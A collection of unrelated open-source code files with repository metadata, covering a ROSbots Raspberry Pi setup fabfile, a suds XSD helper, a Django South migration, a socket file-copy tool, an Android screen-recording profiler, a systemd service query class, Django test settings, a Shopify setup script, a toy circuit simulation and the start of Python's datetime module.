sudo("sudo apt-key adv --keyserver hkp://ha.pool.sks-keyservers.net:80 --recv-key 421C365BD9FF1F717815A3895523BAEEB01FA116") #apt-key adv --keyserver hkp://ha.pool.sks-keyservers.net:80 --recv-key 0xB01FA116")
sudo("apt-get update")
sudo("apt-get -y upgrade")
else:
_fp("ros-lastest.list already exists... skipping set up")
sudo("apt-get update")
sudo("apt-get -y upgrade")
# Install Bootstrap Dependencies
sudo("apt-get install -y python-rosdep python-rosinstall-generator python-wstool python-rosinstall build-essential cmake")
# Initializing rosdep
if not fabfiles.exists("/etc/ros/rosdep/sources.list.d/20-default.list"):
sudo("rosdep init")
run("rosdep update")
home_path = run("pwd")
ws_dir = home_path + WS_DIR
# Create catkin workspace
if not fabfiles.exists(ws_dir):
run("mkdir -p " + ws_dir)
# Compile
with cd(ws_dir):
if not fabfiles.exists("kinetic-ros_comm-wet.rosinstall"):
run("rosinstall_generator ros_comm --rosdistro kinetic --deps --wet-only --tar > kinetic-ros_comm-wet.rosinstall")
if not fabfiles.exists("src"):
_fp("The following wstool downloads the source code needed")
_pp("If wstool init fails or is interrupted, you can resume the download by running:\n wstool update -j 2 -t src\n BTW, the -j 2 option downloads 2 packages in parallel")
run("wstool init -j 2 src kinetic-ros_comm-wet.rosinstall")
else:
_pp("Looks like you had already tried 'wstool init...', so continuing with 'wstool update...'")
run("wstool update --delete-changed-uris -j 2 -t src")
rval = _get_input("Did wstool download everything ok?\n(NO to quit & resolve, ENTER to continue)")
if rval == "NO":
return
# Resolve dependencies
run("rosdep install -y --from-paths src --ignore-src --rosdistro kinetic -r --os=debian:jessie")
install_dir = home_path + INSTALL_DIR
_fp("All dependencies have been resolved, going to start compiling and install into: " + install_dir)
if not fabfiles.exists(install_dir):
run("mkdir -p " + install_dir)
rval = _get_input("Continue with compile or skip? SKIP to skip compile, ENTER to continue...")
if rval != "SKIP":
run("./src/catkin/bin/catkin_make_isolated --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
_rval = _get_input("Did the compile succeed?\n(NO to quit and fix, ENTER to continue)")
if rval == "NO":
return
src_cmd = "source " + install_dir + "/setup.bash"
if run("grep '" + src_cmd + "' ~/.bashrc", warn_only=True).succeeded:
_fp("Sourcing of ROS env setup is already in your bashrc")
else:
_pp("Going to add ROS source setup into your bashrc")
run("echo '" + src_cmd + "\n' >> ~/.bashrc")
run("echo 'export ROSBOTS_MASTER=1\n' >> ~/.bashrc")
# Add some custom python library paths
run("echo 'export PYTHONPATH=/home/pi/lib/python:${PYTHONPATH}\n' >> ~/.bashrc")
# Add other setups for rosbots
put("./sourceme_rosbots.bash", "~/")
run("echo 'source ~/sourceme_rosbots.bash' >> ~/.bashrc")
# Create a separate rosbots_catkin_ws outside of core ROS
rosbots_ws_dir = home_path + "/rosbots_catkin_ws"
if not fabfiles.exists(rosbots_ws_dir):
_fp("Need to create and init rosbots catkin workspace")
run("mkdir -p " + rosbots_ws_dir + "/src")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
with cd(rosbots_ws_dir + "/src"):
run(ws_dir + "/src/catkin/bin/catkin_init_workspace")
with cd(rosbots_ws_dir):
run(ws_dir + "/src/catkin/bin/catkin_make")
run(ws_dir + "/src/catkin/bin/catkin_make install")
env.shell = old_shell
src_cmd = "source " + rosbots_ws_dir + "/devel/setup.bash"
if run("grep '" + src_cmd + "' ~/.bashrc", warn_only=True).succeeded:
_fp("Sourcing of ROSbots catkin ws env setup.bash is already in your bashrc")
else:
_pp("Going to add ROSbots catkin ws source setup into your bashrc")
run("echo '" + src_cmd + "\n' >> ~/.bashrc")
_pp("All ROS components should be compiled and installed. Going to set up init.d to run ROSBots as a service.")
# Copy over the rosbots init script - which is kicked off by the init.d
# service framework
put("./rosbots_startup.sh", "~/rosbots_startup.sh")
run("chmod +x ~/rosbots_startup.sh")
put("./rosbots_shutdown.sh", "~/rosbots_shutdown.sh")
run("chmod +x ~/rosbots_shutdown.sh")
# Set up and install the init.d service which will fork and call
# the rosbots startup script above
put("./rosbots_service_template.bash", "~/rosbots_template")
run("cat rosbots_template | sed 's/_TEMPLATE_HOME/" + home_path.replace("/", "\/") + "/' | sed 's/_TEMPLATE_WS_PATH/" + ws_dir.replace("/", "\/") + "/' > rosbots")
run("rm rosbots_template")
sudo("mv rosbots /etc/init.d/")
sudo("chown root:root /etc/init.d/rosbots")
sudo("chmod 755 /etc/init.d/rosbots")
sudo("update-rc.d rosbots defaults")
sudo("systemctl daemon-reload")
sudo("systemctl stop rosbots")
sudo("systemctl start rosbots")
_fp("To get IP address of Pi, from a linux system - 'arp -a'")
_fp("Done...")
|
ROSbots/rosbots_setup_tools
|
rpi_setup/fabfile.py
|
Python
|
gpl-3.0
| 34,336 | 0.006291 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
from suds import *
from suds.sax import Namespace, splitPrefix
def qualify(ref, resolvers, defns=Namespace.default):
"""
Get a reference that is I{qualified} by namespace.
@param ref: A referenced schema type name.
@type ref: str
@param resolvers: A list of objects to be used to resolve types.
@type resolvers: [L{sax.element.Element},]
@param defns: An optional target namespace used to qualify references
when no prefix is specified.
@type defns: A default namespace I{tuple: (prefix,uri)} used when ref not prefixed.
@return: A qualified reference.
@rtype: (name, namespace-uri)
"""
ns = None
p, n = splitPrefix(ref)
if p is not None:
if not isinstance(resolvers, (list, tuple)):
resolvers = (resolvers,)
for r in resolvers:
resolved = r.resolvePrefix(p)
if resolved[1] is not None:
ns = resolved
break
if ns is None:
raise Exception('prefix (%s) not resolved' % p)
else:
ns = defns
return (n, ns[1])
def isqref(object):
"""
Get whether the object is a I{qualified reference}.
@param object: An object to be tested.
@type object: I{any}
@rtype: boolean
@see: L{qualify}
"""
return (\
isinstance(object, tuple) and \
len(object) == 2 and \
isinstance(object[0], basestring) and \
isinstance(object[1], basestring))
class Filter:
def __init__(self, inclusive=False, *items):
self.inclusive = inclusive
self.items = items
def __contains__(self, x):
if self.inclusive:
result = ( x in self.items )
else:
result = ( x not in self.items )
return result
|
BhallaLab/moose
|
moose-gui/suds/xsd/__init__.py
|
Python
|
gpl-3.0
| 2,613 | 0.004592 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Contact'
db.create_table('storybase_user_contact', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('storybase.fields.ShortTextField')(blank=True)),
('info', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('storybase_user', ['Contact'])
def backwards(self, orm):
# Deleting model 'Contact'
db.delete_table('storybase_user_contact')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'storybase_asset.asset': {
'Meta': {'object_name': 'Asset'},
'asset_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'asset_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'attribution': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'datasets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'assets'", 'blank': 'True', 'to': "orm['storybase_asset.DataSet']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'license': ('django.db.models.fields.CharField', [], {'default': "'CC BY-NC-SA'", 'max_length': '25'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'assets'", 'null': 'True', 'to': "orm['auth.User']"}),
'published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'section_specific': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'draft'", 'max_length': '10'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
'storybase_asset.dataset': {
'Meta': {'object_name': 'DataSet'},
'attribution': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'dataset_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'dataset_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'datasets'", 'null': 'True', 'to': "orm['auth.User']"}),
'published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'draft'", 'max_length': '10'})
},
'storybase_story.story': {
'Meta': {'object_name': 'Story'},
'assets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'stories'", 'blank': 'True', 'to': "orm['storybase_asset.Asset']"}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'stories'", 'null': 'True', 'to': "orm['auth.User']"}),
'byline': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'featured_assets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'featured_in_stories'", 'blank': 'True', 'to': "orm['storybase_asset.Asset']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'license': ('django.db.models.fields.CharField', [], {'default': "'CC BY-NC-SA'", 'max_length': '25'}),
'on_homepage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'stories'", 'blank': 'True', 'to': "orm['storybase_user.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'stories'", 'blank': 'True', 'to': "orm['storybase_user.Project']"}),
'published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'draft'", 'max_length': '10'}),
'story_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'structure_type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'storybase_user.contact': {
'Meta': {'object_name': 'Contact'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('storybase.fields.ShortTextField', [], {'blank': 'True'})
},
'storybase_user.organization': {
'Meta': {'object_name': 'Organization'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'curated_stories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'curated_in_organizations'", 'blank': 'True', 'through': "orm['storybase_user.OrganizationStory']", 'to': "orm['storybase_story.Story']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'organizations'", 'blank': 'True', 'to': "orm['auth.User']"}),
'organization_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'storybase_user.organizationstory': {
'Meta': {'object_name': 'OrganizationStory'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_user.Organization']"}),
'story': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_story.Story']"}),
'weight': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'storybase_user.organizationtranslation': {
'Meta': {'unique_together': "(('organization', 'language'),)", 'object_name': 'OrganizationTranslation'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "'en'", 'max_length': '15'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('storybase.fields.ShortTextField', [], {}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_user.Organization']"}),
'translation_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'})
},
'storybase_user.project': {
'Meta': {'object_name': 'Project'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'curated_stories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'curated_in_projects'", 'blank': 'True', 'through': "orm['storybase_user.ProjectStory']", 'to': "orm['storybase_story.Story']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'projects'", 'blank': 'True', 'to': "orm['auth.User']"}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'projects'", 'blank': 'True', 'to': "orm['storybase_user.Organization']"}),
'project_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'storybase_user.projectstory': {
'Meta': {'object_name': 'ProjectStory'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_user.Project']"}),
'story': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_story.Story']"}),
'weight': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'storybase_user.projecttranslation': {
'Meta': {'unique_together': "(('project', 'language'),)", 'object_name': 'ProjectTranslation'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "'en'", 'max_length': '15'}),
'name': ('storybase.fields.ShortTextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_user.Project']"}),
'translation_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'})
}
}
complete_apps = ['storybase_user']
|
denverfoundation/storybase
|
apps/storybase_user/migrations/0006_auto__add_contact.py
|
Python
|
mit
| 14,929 | 0.007636 |
#!/usr/bin/env python
#Protocol:
# num_files:uint(4)
# repeat num_files times:
# filename:string
# size:uint(8)
# data:bytes(size)
import sys, socket
import os
from time import time
DEFAULT_PORT = 52423
PROGRESSBAR_WIDTH = 50
BUFSIZE = 1024*1024
CONNECTION_TIMEOUT = 3.0
RECEIVE_TIMEOUT = 5.0
if os.name == "nt":
sep = "\\"
else:
sep = '/'
def main():
if len(sys.argv)<2:
usage()
return
if sys.argv[1]=='-s' and len(sys.argv) >= 4:
try:
send()
except KeyboardInterrupt:
printError("\nAbort")
elif sys.argv[1]=='-r':
try:
recieve()
except KeyboardInterrupt:
printError("\nAbort")
else:
usage()
def printError(s):
sys.stderr.write(s+'\n')
def encodeInt(l, size):
if l > ((0x1 << (8*size))-1):
raise ValueError("Number too large: {0}".format(l))
b = bytearray(size)
i = 0
while l > 0:
b[i] = (l & 0xff)
l = l >> 8
i+=1
b.reverse()
return b
def encodeString(s):
return s+b'\x00'
def recieveInt(size, conn):
data = conn.recv(size)
b = bytearray(data)
if len(b) != size:
raise ValueError("Received invalid data")
value = 0
for i in range(0,size):
value = value << 8
value += b[i]
return value
def recieveString(conn):
s = ""
ch = ''
while True:
ch = conn.recv(1)
if ch == b'\x00':
break
s += ch
return s
def send():
port = DEFAULT_PORT
i = 2
files = []
while i < len(sys.argv): #-2
if sys.argv[i]=='-p':
if i+1 >= len(sys.argv):
printError("Expecting port after '-p'")
return
try:
port = int(sys.argv[i+1])
except ValueError:
printError("Invalid port: "+sys.argv[i+1])
return
i+=1
else:
receiver = sys.argv[i]
files = sys.argv[i+1:]
break
i+=1
num_files = 0
open_files = []
for fn in files:
try:
f = open(fn, "rb")
open_files.append((fn, f))
num_files+=1
except IOError as e:
printError("Could not open file {0}: {1}. Skipping".format(fn, e.strerror))
if num_files == 0:
printError("No files to send. Aborting")
return
try:
client = socket.create_connection((receiver, port), CONNECTION_TIMEOUT)
except Exception as e:
message = str(e)
if hasattr(e, 'strerror'):
message = e.strerror
printError("Could not connect to {0}: {1}".format(receiver, message))
return
print("--- Sending {0} file(s) to {1} ---".format(num_files, receiver))
metadata = bytearray()
metadata += encodeInt(num_files, 4)
for (fn, f) in open_files:
metadata += encodeString(fn[fn.rfind(sep)+1:])
f.seek(0,2)
size = f.tell()
print("- Sending {0} ({1} bytes)".format(fn, size))
metadata += encodeInt(size, 8)
client.sendall(metadata)
metadata = bytearray()
f.seek(0,0)
while size > 0:
bytebuf = bytearray(f.read(BUFSIZE))
client.sendall(bytebuf)
size -= BUFSIZE
f.close()
client.close()
def recieve():
port = DEFAULT_PORT
i = 2
while i < len(sys.argv):
if sys.argv[i]=='-p':
if i+1 >= len(sys.argv):
printError("Expecting port after '-p'")
return
try:
port = int(sys.argv[i+1])
except ValueError:
printError("Invalid port: "+sys.argv[i+1])
return
i+=1
else:
printError("Unrecognized argument: "+sys.argv[i])
return
i+=1
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('', port))
except Exception as e:
printError("Could not bind socket: {0}".format(e.strerror))
return
print("Waiting for incoming connections...")
server.listen(1)
conn, addr = server.accept()
print("Connected to {0}".format(addr[0]))
num_files = recieveInt(4, conn)
print("Recieving {0} file(s)".format(num_files))
if num_files > (0x1 << 16):
printError("Too many files. Aborting")
return
try:
for i in range(0,num_files):
fn = recieveString(conn)
filesize = recieveInt(8, conn)
print("- {0} ({1} bytes)".format(fn, filesize))
if os.path.isfile(fn):
print(" Error: file '{0}' already exists. Skipping".format(fn))
conn.recv(filesize)
continue
f = open(fn, "wb")
size = filesize
printProgressBar(0)
lastreceivetime = time()
printProgressBar(0)
while size > 0:
buffersize = min(BUFSIZE, size)
data = conn.recv(buffersize)
if len(data) == 0:
if time()-lastreceivetime > RECEIVE_TIMEOUT:
printError("\nReceive timeout. Aborting")
server.close()
return
continue
lastreceivetime = time()
size -= len(data)
f.write(data)
ratio = float(filesize-size)/float(filesize)
printProgressBar(ratio)
printProgressBar(1)
print("")
f.close()
except ValueError:
printError("Protocol error. Aborting")
finally:
server.close()
def printProgressBar(ratio):
if ratio < 0 or ratio > 1:
raise ValueError("Error: invalid ratio: {0}".format(ratio))
progressbar_length = int(ratio * PROGRESSBAR_WIDTH)
progressbar = '#'*progressbar_length + ' '*(PROGRESSBAR_WIDTH-progressbar_length) + " - {0:.2f}%".format(ratio*100.0)
sys.stdout.write("\r"+progressbar)
sys.stdout.flush()
def usage():
print("Usage:\n"
"\t{0} -s [-p port] [receiver] [files...]\t- Send files to receiver\n"
"\t{0} -r [-p port]\t\t\t\t- Receive files"
.format(sys.argv[0][sys.argv[0].rfind(sep)+1:]))
if __name__ == "__main__":
main()
|
lorian1333/netcopy
|
netcopy.py
|
Python
|
mit
| 5,187 | 0.04492 |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import subprocess
from telemetry.core.platform import profiler
from telemetry.core import util
from telemetry.internal.backends.chrome import android_browser_finder
class AndroidScreenRecordingProfiler(profiler.Profiler):
"""Captures a screen recording on Android."""
def __init__(self, browser_backend, platform_backend, output_path, state):
super(AndroidScreenRecordingProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
self._output_path = output_path + '.mp4'
self._recorder = subprocess.Popen(
[os.path.join(util.GetChromiumSrcDir(), 'build', 'android',
'screenshot.py'),
'--video',
'--file', self._output_path,
'--device', browser_backend.adb.device_serial()],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
@classmethod
def name(cls):
return 'android-screen-recorder'
@classmethod
def is_supported(cls, browser_type):
if browser_type == 'any':
return android_browser_finder.CanFindAvailableBrowsers()
return browser_type.startswith('android')
def CollectProfile(self):
self._recorder.communicate(input='\n')
print 'Screen recording saved as %s' % self._output_path
print 'To view, open in Chrome or a video player'
return [self._output_path]
|
SaschaMester/delicium
|
tools/telemetry/telemetry/core/platform/profiler/android_screen_recorder_profiler.py
|
Python
|
bsd-3-clause
| 1,492 | 0.005362 |
# Copyright (C) 2020 Red Hat, Inc., Jake Hunsaker <jhunsake@redhat.com>
# This file is part of the sos project: https://github.com/sosreport/sos
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# version 2 of the GNU General Public License.
#
# See the LICENSE file in the source distribution for further information.
from sos.policies.init_systems import InitSystem
from sos.utilities import shell_out
class SystemdInit(InitSystem):
"""InitSystem abstraction for SystemD systems"""
def __init__(self):
super(SystemdInit, self).__init__(
init_cmd='systemctl',
list_cmd='list-unit-files --type=service',
query_cmd='status'
)
self.load_all_services()
def parse_query(self, output):
for line in output.splitlines():
if line.strip().startswith('Active:'):
return line.split()[1]
return 'unknown'
def load_all_services(self):
svcs = shell_out(self.list_cmd).splitlines()[1:]
for line in svcs:
try:
name = line.split('.service')[0]
config = line.split()[1]
self.services[name] = {
'name': name,
'config': config
}
except IndexError:
pass
def is_running(self, name):
svc = self.get_service_status(name)
return svc['status'] == 'active'
# vim: set et ts=4 sw=4 :
|
TurboTurtle/sos
|
sos/policies/init_systems/systemd.py
|
Python
|
gpl-2.0
| 1,563 | 0 |
# coding: utf-8
from app.settings.dist import *
try:
from app.settings.local import *
except ImportError:
pass
from app.settings.messages import *
from app.settings.dist import INSTALLED_APPS
DEBUG = True
DEV_SERVER = True
USER_FILES_LIMIT = 1.2 * 1024 * 1024
SEND_MESSAGES = False
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '_test.sqlite',
},
}
INSTALLED_APPS = list(INSTALLED_APPS)
removable = ['south', ]
for app in removable:
if app in INSTALLED_APPS:
INSTALLED_APPS.remove(app)
TEST_DATABASE_NAME = DATABASES['default']['NAME'] if \
DATABASES['default']['NAME'].startswith('test_') else \
'test_' + DATABASES['default']['NAME']
|
tarvitz/djtp
|
app/settings/test.py
|
Python
|
bsd-3-clause
| 721 | 0.001387 |
"""
Shopify Trois
---------------
Shopify API for Python 3
"""
from setuptools import setup
setup(
name='shopify-trois',
version='1.1-dev',
url='http://masom.github.io/shopify-trois',
license='MIT',
author='Martin Samson',
author_email='pyrolian@gmail.com',
maintainer='Martin Samson',
maintainer_email='pyrolian@gmail.com',
description='Shopify API for Python 3',
long_description=__doc__,
packages=[
'shopify_trois', 'shopify_trois.models', 'shopify_trois.engines',
'shopify_trois.engines.http'
],
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=[
'requests>=1.2.3'
],
test_suite='nose.collector',
tests_require=[
'pytest', 'nose', 'mock'
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
|
masom/shopify-trois
|
setup.py
|
Python
|
mit
| 1,267 | 0 |
class node:
def __init__(self):
self.outputs=[]
def set(self):
for out in self.outputs:
out.set()
def clear(self):
for out in self.outputs:
out.clear()
class switch:
def __init__(self):
self.outputs=[]
self.state=False
self.input=False
def set(self):
self.input=True
if(self.state):
for out in self.outputs:
out.set()
def clear(self):
self.input=False
for out in self.outputs:
out.clear()
def open(self):
self.state=False
for out in self.outputs:
out.clear()
def close(self):
self.input=True
if(self.input):
for out in self.outputs:
out.set()
class light:
def __init__(self):
self.outputs=[]
def set(self):
print('light set')
for out in self.outputs:
out.set()
def clear(self):
print('light cleared')
for out in self.outputs:
out.clear()
if __name__ == '__main__':
a=node()
s=switch()
b=node()
l=light()
a.outputs.append(s)
s.outputs.append(b)
b.outputs.append(l)
a.set()
s.close()
print('switch close')
s.open()
|
mikadam/LadderiLogical
|
tests/node.py
|
Python
|
mit
| 1,030 | 0.067961 |
"""Concrete date/time and related types.
See http://www.iana.org/time-zones/repository/tz-link.html for
time zone and DST data sources.
"""
import time as _time
import math as _math
def _cmp(x, y):
return 0 if x == y else 1 if x > y else -1
MINYEAR = 1
MAXYEAR = 9999
_MAXORDINAL = 3652059 # date.max.toordinal()
# Utility functions, adapted from Python's Demo/classes/Dates.py, which
# also assumes the current Gregorian calendar indefinitely extended in
# both directions. Difference: Dates.py calls January 1 of year 0 day
# number 1. The code here calls January 1 of year 1 day number 1. This is
# to match the definition of the "proleptic Gregorian" calendar in Dershowitz
# and Reingold's "Calendrical Calculations", where it's the base calendar
# for all computations. See the book for algorithms for converting between
# proleptic Gregorian ordinals and many other calendar systems.
# -1 is a placeholder for indexing purposes.
_DAYS_IN_MONTH = [-1, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
_DAYS_BEFORE_MONTH = [-1] # -1 is a placeholder for indexing purposes.
dbm = 0
for dim in _DAYS_IN_MONTH[1:]:
_DAYS_BEFORE_MONTH.append(dbm)
dbm += dim
del dbm, dim
def _is_leap(year):
"year -> 1 if leap year, else 0."
